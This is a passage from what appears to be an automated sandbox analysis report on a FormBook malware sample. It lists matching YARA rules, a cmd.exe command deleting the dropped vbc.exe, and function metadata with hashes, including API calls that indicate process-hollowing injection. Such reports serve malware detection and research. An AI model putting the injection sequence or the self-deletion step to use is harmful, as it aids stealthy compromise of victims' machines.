                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2377903647.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2377903647.00000000001A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2377903647.00000000001A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  Reputation:moderate

                                  Chronological Activities

                                  Analysis Process: cmd.exe PID: 1688 Parent PID: 3036

                                  General

                                  Start time:15:24:38
                                  Start date:10/06/2021
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:/c del 'C:\Users\Public\vbc.exe'
                                  Imagebase:0x4a4c0000
                                  File size:302592 bytes
                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Chronological Activities

                                  Disassembly

                                  Code Analysis

                                  Reset < >

                                    Analysis Process: vbc.exe PID: 2792 Parent PID: 2676 vbc.exeCOMMON

                                    Executed Functions

                                    Function 001E0DF0, Relevance: 2.5, Instructions: 2471COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 07b23952a5c4a795cec72cfe6380df194f1d469a7de771b605442f5870d459e5
                                    • Instruction ID: a04ed0156997c39723b8862936abe4b150763ff7d18e4926bca85b840c0948d4
                                    • Opcode Fuzzy Hash: 07b23952a5c4a795cec72cfe6380df194f1d469a7de771b605442f5870d459e5
                                    • Instruction Fuzzy Hash: 6553E334A50218CFC765DF24C898E99B7B5FF8A704F1145EAE50AAB361DB71AE81CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001E0330, Relevance: 2.5, Instructions: 2470COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 61eaed82d987b47097838774d76716594693be3b648d2faa53c5843ad93adcf4
                                    • Instruction ID: 6a2323608bc0ff66785141a57745e63d5d2456d69948d2cfda6bb715c957379b
                                    • Opcode Fuzzy Hash: 61eaed82d987b47097838774d76716594693be3b648d2faa53c5843ad93adcf4
                                    • Instruction Fuzzy Hash: 3853D334A50218CFC765DF24C898E99B7B5FF8A704F1145EAE50AAB361DB71AE81CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B84C8, Relevance: 1.5, Strings: 1, Instructions: 248COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID: vSCr
                                    • API String ID: 0-1689631843
                                    • Opcode ID: 5377f25e46c6bc83454829b5fbf804d28ff33cbb1ffcc0f283a1f0a963569a8c
                                    • Instruction ID: 6e966b5a7b311d8d8dd8595d283692e57196cc849ae5f91269fdc8fae1e96897
                                    • Opcode Fuzzy Hash: 5377f25e46c6bc83454829b5fbf804d28ff33cbb1ffcc0f283a1f0a963569a8c
                                    • Instruction Fuzzy Hash: DAA11874E00219CBCB14CFE9D6845DEFBF6AF88324F64C565D405AB354EB349942CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B84B8, Relevance: 1.5, Strings: 1, Instructions: 245COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID: vSCr
                                    • API String ID: 0-1689631843
                                    • Opcode ID: a5ee4a68010d52aed995b0f0c96f1ee862fc4fa4156d9d1b4f1015c74d5e631c
                                    • Instruction ID: 1a86fefd3054296961c6f98faf94533afa85cd3c2f2368425a631efc44df59ab
                                    • Opcode Fuzzy Hash: a5ee4a68010d52aed995b0f0c96f1ee862fc4fa4156d9d1b4f1015c74d5e631c
                                    • Instruction Fuzzy Hash: 9DA12874E042198FCB14CFE9CA845DEFBF6AF88324F64C466D405AB354EB349942CB65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B8850, Relevance: 1.5, Strings: 1, Instructions: 226COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID: vSCr
                                    • API String ID: 0-1689631843
                                    • Opcode ID: ab26d74713e2990065bdb235f6c551dc15b43e46599ec6248e7416af6b6a0901
                                    • Instruction ID: 344a6dc457493dac007351e50eeac3cf63cb8a7bb2dff65e6edd259796cea51a
                                    • Opcode Fuzzy Hash: ab26d74713e2990065bdb235f6c551dc15b43e46599ec6248e7416af6b6a0901
                                    • Instruction Fuzzy Hash: 51913674E04219CFCB10DFE8D6845DEBBFAAF88324F648865D405AB354EB349D42CB65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001E61D5, Relevance: 1.4, Strings: 1, Instructions: 185COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID: @2Bm
                                    • API String ID: 0-1827899069
                                    • Opcode ID: f7f8ec544ff17d147cc4429061c7173f0008dfa57ce9a0ad5973010d177aa1be
                                    • Instruction ID: 3f737fb757fac3ab89b24e6cc9521e1572a5709870787b08b53b1ed1e6824379
                                    • Opcode Fuzzy Hash: f7f8ec544ff17d147cc4429061c7173f0008dfa57ce9a0ad5973010d177aa1be
                                    • Instruction Fuzzy Hash: BE719E709042488FDB05EFBAD850A9DBFF2BFC9304F14C939D0099B665DB34598ADB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B74C3, Relevance: .3, Instructions: 272COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d4d0e73ebd0efa8ebf006a4df8603e280e77d01f396824182a9b3343ceb1f201
                                    • Instruction ID: 6ac6eed5b2fd7df89a9377ce2633a307413502cab90ee0990471fc073d1665c9
                                    • Opcode Fuzzy Hash: d4d0e73ebd0efa8ebf006a4df8603e280e77d01f396824182a9b3343ceb1f201
                                    • Instruction Fuzzy Hash: 46B1D074D092598FCB10CFA9C9805EDFBF2BF89314F2486AAD445A7356D7309942CF61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001EC688, Relevance: .2, Instructions: 247COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2ea87081e38e29da36dad17da36328dcfe4904f2d122516903796879e3fea613
                                    • Instruction ID: 3e24cef0908a87d7ef7f3181310d75b2874c570de8a1368a08486422371b3ae9
                                    • Opcode Fuzzy Hash: 2ea87081e38e29da36dad17da36328dcfe4904f2d122516903796879e3fea613
                                    • Instruction Fuzzy Hash: 9EA11470D00659CFEF24DFBAC844BDEBBB2AF99318F548469D508B7241DB3049868FA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001EEFF0, Relevance: .2, Instructions: 189COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: faa41c1ed37e57775068dc0657c5732e79c374d405548009cb6b83234ed3a05e
                                    • Instruction ID: 0ccc3ea011211c7537b4e9257dc60b3be9b7304a74f747d16b5c84db76c47a38
                                    • Opcode Fuzzy Hash: faa41c1ed37e57775068dc0657c5732e79c374d405548009cb6b83234ed3a05e
                                    • Instruction Fuzzy Hash: 8C81C474E006188FDB08CFEAC894A9EFBB2FF89300F14842AD815BB254D7359906CF54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B0298, Relevance: .1, Instructions: 72COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2e2307f07c457d5a32a5b50259bba9a7377e8542a8b52e8250ed2d162dea3600
                                    • Instruction ID: 5507238a8acda3f8bf75c421bc5929a07e62db176c7eb3952f81609ab8c9ff58
                                    • Opcode Fuzzy Hash: 2e2307f07c457d5a32a5b50259bba9a7377e8542a8b52e8250ed2d162dea3600
                                    • Instruction Fuzzy Hash: CA21C871E006188BEB18CF9BD9542DEFBF7AFC8311F14C16AD409A6264EB741A45CF90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B0288, Relevance: .1, Instructions: 67COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 81f8ba747465aaa4d636f1abeba9eade6070fa7a60105620bb3d50a8a2ab1436
                                    • Instruction ID: b9c01978e8b83c6f553b62f841f5edc596e14c476dcd59552de5cab83aaa09ad
                                    • Opcode Fuzzy Hash: 81f8ba747465aaa4d636f1abeba9eade6070fa7a60105620bb3d50a8a2ab1436
                                    • Instruction Fuzzy Hash: 8621C8B1E006588BEB18CFABD9542DEBBF7AFC9311F14C16AD409A6268DB740945CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B3900, Relevance: .1, Instructions: 65COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 598e41cf42c8b16d1bba08f3650c154eb1c32f0d40a9e35c083f8134a7545f79
                                    • Instruction ID: 7827c1a815880af028391dc573806be57181c072a9e812e36a8c7ccee6e2835a
                                    • Opcode Fuzzy Hash: 598e41cf42c8b16d1bba08f3650c154eb1c32f0d40a9e35c083f8134a7545f79
                                    • Instruction Fuzzy Hash: D821DA71E046188BEB18CFABD84069EFBF7AFC8200F04C576D408A6224EB341A458F51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009BAAC8, Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 009BAD8F
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: 7485ac148c1d3d81aa75116d67d7b75e72b122bf215e3223795473774805eb36
                                    • Instruction ID: 1504a3286b8d8e618c82341a9aeadf205e4108a71dfb3e1c9bda53f257f8fe93
                                    • Opcode Fuzzy Hash: 7485ac148c1d3d81aa75116d67d7b75e72b122bf215e3223795473774805eb36
                                    • Instruction Fuzzy Hash: BEC14670D0022D8FDB24CFA4C945BEDBBB6BF49314F1085A9E859B7240EB749A85CF91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009BA730, Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 009BA803
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: d56f51b197bc2e46f42e88d1c512a21efdb511f8575c7389181c5f0b31df3ae3
                                    • Instruction ID: 61f829f60fbc22eaaa55c2a0c84f3af3efda09ba6c1d3677999920dc97f7cf58
                                    • Opcode Fuzzy Hash: d56f51b197bc2e46f42e88d1c512a21efdb511f8575c7389181c5f0b31df3ae3
                                    • Instruction Fuzzy Hash: FB41BBB4D012089FCF00CFA9D984AEEFBF1BB49314F20942AE815B7200D734AA45CFA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009BA890, Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                    Download Yara Rule
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 009BA942
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: 51a307525d09f3e2a04d4cf71d14dd14176ee74393ce131a682abfd0bfad3b6f
                                    • Instruction ID: d37bc5137d3d8fa54e244cf5c1677f7ae5ba129467f0bc1f65c24334e3ca9c44
                                    • Opcode Fuzzy Hash: 51a307525d09f3e2a04d4cf71d14dd14176ee74393ce131a682abfd0bfad3b6f
                                    • Instruction Fuzzy Hash: DD41A7B9D002589FCF10CFE9D884AEEFBB5BB49310F20A42AE815B7200D775A945DF65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009BA608, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 009BA6B2
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 60e1bc56734ce53e659dc675a3f689f81854db967f5b62fe9b252f58e4b82fde
                                    • Instruction ID: 2a9164c60e757b9b191d371deb1a84a7c99fea2b2c94940c9f99419aa1e94662
                                    • Opcode Fuzzy Hash: 60e1bc56734ce53e659dc675a3f689f81854db967f5b62fe9b252f58e4b82fde
                                    • Instruction Fuzzy Hash: 224197B9D00258DFCF10CFA9D984AEEFBB5BB49314F24942AE815B7200D775A901CFA5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B6A92, Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 009B6B3F
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 2c2bf2f32cf5d8b8f62d1b1debe5b0469e50f1dc5861b4b04b74034edddf5f10
                                    • Instruction ID: 7522d2e74eaf695babd4e13b805981e152944985e187d35fcc34d2e66c26e0e7
                                    • Opcode Fuzzy Hash: 2c2bf2f32cf5d8b8f62d1b1debe5b0469e50f1dc5861b4b04b74034edddf5f10
                                    • Instruction Fuzzy Hash: 6831B9B5D042589FCF10CFA9D984AEEFBB0BB09310F24942AE814B7210D339A945CF64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B6A98, Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 009B6B3F
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 327eb64bd45609a7676244e98de681b3ad598498253e10249e139fe8d0e32525
                                    • Instruction ID: 616e12f00cb9dd9e2d6892f4fcd399c0f348b782949bb110623739122d5e25ff
                                    • Opcode Fuzzy Hash: 327eb64bd45609a7676244e98de681b3ad598498253e10249e139fe8d0e32525
                                    • Instruction Fuzzy Hash: A83198B9D042589FCF10CFA9D984AEEFBB5BB09310F24942AE814B7310D775AA45CF64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009BA4D8, Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 009BA587
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: 16875ec95915e7167f08403b8410f28838142e994b5ee239f5e05755b44acac4
                                    • Instruction ID: b8627c1c2ff41cc614e44a8dfeb8cd57c448724905297cc7307f5b6be3258ea3
                                    • Opcode Fuzzy Hash: 16875ec95915e7167f08403b8410f28838142e994b5ee239f5e05755b44acac4
                                    • Instruction Fuzzy Hash: 9E41AAB5D012189FCB10CFA9D884AEEFBB5BB49314F24842AE419B7240D778AA45CF95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B9DE2, Relevance: 1.6, APIs: 1, Instructions: 76threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ResumeThread.KERNELBASE(?), ref: 009B9E66
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: a1d60e406470fe640beeea205d21f4887676034c939f02cd94b38f17f1dafece
                                    • Instruction ID: 95863531f29a6e41cb5cfa37acdd237350260b161c384050aae5ffe79539e7d7
                                    • Opcode Fuzzy Hash: a1d60e406470fe640beeea205d21f4887676034c939f02cd94b38f17f1dafece
                                    • Instruction Fuzzy Hash: D231C9B4D002189FCF14CFA9E884AEEFBB5BF49314F24942AE819B7200D775A901CF94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B9DE8, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ResumeThread.KERNELBASE(?), ref: 009B9E66
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: be50230590f9f0506510b4c7cabb4d15ddc21aab62e50723566613b3574c702f
                                    • Instruction ID: eeb979e8bd8bc20b3df35157309470442e31c9fb30e953e57427b1346c08dd9c
                                    • Opcode Fuzzy Hash: be50230590f9f0506510b4c7cabb4d15ddc21aab62e50723566613b3574c702f
                                    • Instruction Fuzzy Hash: 8831B9B5D012189FCF14CFA9E884AEEFBB5BB49314F24942AE819B7300D775A901CF94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001E08E8, Relevance: 1.5, Strings: 1, Instructions: 211COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID: @2Bm
                                    • API String ID: 0-1827899069
                                    • Opcode ID: 9872966279354b1b158e234f7d68f8c7638a653bbbd4215f541f4147fbf368a6
                                    • Instruction ID: f1304bfca9554979d423fdff12493122daf894607b4517177955037f7d4a9db9
                                    • Opcode Fuzzy Hash: 9872966279354b1b158e234f7d68f8c7638a653bbbd4215f541f4147fbf368a6
                                    • Instruction Fuzzy Hash: 6391D274E006188FDB14CFA9C994B9DBBF2BF49304F2085A9E509AB361DB709D85DF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001E4A50, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID: $
                                    • API String ID: 0-3993045852
                                    • Opcode ID: 386ac93c26103157f014fe4386a6ac83424575a519efad18b569c7148d4d4869
                                    • Instruction ID: 3e02d1ac29f113f7da86c0d5ebecf45d94651e12a0e6cefbd19de86dc69a0739
                                    • Opcode Fuzzy Hash: 386ac93c26103157f014fe4386a6ac83424575a519efad18b569c7148d4d4869
                                    • Instruction Fuzzy Hash: C041CD75E002088FCF14CFE5C944ADDBBB6FF89300F10812AE909AB264DB71A95ACF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001E58E8, Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID: zA
                                    • API String ID: 0-2513629829
                                    • Opcode ID: d7447bdc667ed96aedeca7086aff31e5e802b0494c50d63b0b05b552f93571b1
                                    • Instruction ID: 3db5af3981ee69be70559b112af251ff046087aec8051b66767bdbd1e0518a59
                                    • Opcode Fuzzy Hash: d7447bdc667ed96aedeca7086aff31e5e802b0494c50d63b0b05b552f93571b1
                                    • Instruction Fuzzy Hash: AB313674D05A48DFCB04DFA6E848AEEBBF2BF49328F10852AE415B3252C7745984CF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001E0650, Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID: LA
                                    • API String ID: 0-2113221690
                                    • Opcode ID: fc67af9163e03e64aab86c2d2d61963ed7a4a8b87899dd8cb553ff19a95e8f7b
                                    • Instruction ID: 5ba6425da30e4a4d9da02c8f4820cec21448f548bbe8fc904b9105f9ef66a5c0
                                    • Opcode Fuzzy Hash: fc67af9163e03e64aab86c2d2d61963ed7a4a8b87899dd8cb553ff19a95e8f7b
                                    • Instruction Fuzzy Hash: 78212578E04249CFCB05DFA9C484AADBFF0BF4A304F1084AAD445AB361DBB09A94DF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001E0660, Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID: LA
                                    • API String ID: 0-2113221690
                                    • Opcode ID: bb5ff898754aae346f78e134dfc8c354c80324d3ccd0a47f9e9d1cbecff12b06
                                    • Instruction ID: 65338b821ba2e7103202194a0a0a60e6d81b6e93b9d4cee35b3d306248c86af5
                                    • Opcode Fuzzy Hash: bb5ff898754aae346f78e134dfc8c354c80324d3ccd0a47f9e9d1cbecff12b06
                                    • Instruction Fuzzy Hash: 0121C478E00219DFCB04DFA9C584AAEBBF5BF49304F1044A9D405AB360EB74AE94DF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001EE4A7, Relevance: 1.3, Strings: 1, Instructions: 42COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID: 3"}
                                    • API String ID: 0-2222199070
                                    • Opcode ID: d9e0531c23f65a435c4c6ac485b51146bb9ad13a108eda6b313abfd1042b5680
                                    • Instruction ID: 34e6db16f21527d107298adf1fdbbb7f2b86e17c4e8698235127579c05ee920f
                                    • Opcode Fuzzy Hash: d9e0531c23f65a435c4c6ac485b51146bb9ad13a108eda6b313abfd1042b5680
                                    • Instruction Fuzzy Hash: CD112A74A102588FDB54DFA9D890B9DB7B2AF89204F00C4AAE409B7354CB34AD84CF20
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001E5AA0, Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID: {A
                                    • API String ID: 0-2362033092
                                    • Opcode ID: fca44a4a1b79bcd9759549e9e542a489339a3d971ad141e6ec725eae4b334efa
                                    • Instruction ID: edbccf958544897a6a8e8bc96adfa090624eca69da83a2de75c83d8d4d5dd10b
                                    • Opcode Fuzzy Hash: fca44a4a1b79bcd9759549e9e542a489339a3d971ad141e6ec725eae4b334efa
                                    • Instruction Fuzzy Hash: 3AE06D3180D6889FCB26CFE0D8444EDBF719B47301F1442AAC84963652D3310A94DB85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001E4CC9, Relevance: .2, Instructions: 239COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0996e3742a7b10050823a396f130459594e97f2cb669d9ab872b07c14d88c145
                                    • Instruction ID: 0c994c4d1827abae22922eee3ae06a139a94bf9e181a058cd155993e6bc77ca2
                                    • Opcode Fuzzy Hash: 0996e3742a7b10050823a396f130459594e97f2cb669d9ab872b07c14d88c145
                                    • Instruction Fuzzy Hash: 94815B74E006888FCF14DBF9C884AEEB7FABF88318F548519EA14A7365D7349C408B61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001E08DA, Relevance: .2, Instructions: 189COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b282c2d73aa971600642f62db3289054dfca13cfb66ab8007db1c1b1a2bca4d1
                                    • Instruction ID: d1657ebac61ce80a0bd9ddb7d3a441355b880735274bf9266a9d4c6ab4d93a9a
                                    • Opcode Fuzzy Hash: b282c2d73aa971600642f62db3289054dfca13cfb66ab8007db1c1b1a2bca4d1
                                    • Instruction Fuzzy Hash: BF81F374E006588FDB15CFA9C894B9DBBF2BF49304F2081AAE509AB361DB749D85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001E5AF8, Relevance: .2, Instructions: 187COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fc85dbfaab68927ea9904ca9126c21bbeebd290be73602513d9b4b936281f985
                                    • Instruction ID: 1636e905bb5a7fad30e7e1facc2f9939cbc72ad456fa72a2bb41dc10f41d6f4f
                                    • Opcode Fuzzy Hash: fc85dbfaab68927ea9904ca9126c21bbeebd290be73602513d9b4b936281f985
                                    • Instruction Fuzzy Hash: 6B81F774D05658CFCB18DFA9D984AADBBB2FF89304F20852AE40AAB351DB745D81CF41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001E48F8, Relevance: .1, Instructions: 105COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 90cca5c79e9d1834465f478c182aa0eae952bc3630fecc94993859b3a74a601d
                                    • Instruction ID: 724ae4daf77ffa622d394a029c2b74da9084e78b66977f536e60593908e82537
                                    • Opcode Fuzzy Hash: 90cca5c79e9d1834465f478c182aa0eae952bc3630fecc94993859b3a74a601d
                                    • Instruction Fuzzy Hash: 00415535D04208DFCB05DFB8D8459DEBBB2FF89300F10816AE545AB261EB349999CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001E58F8, Relevance: .1, Instructions: 90COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
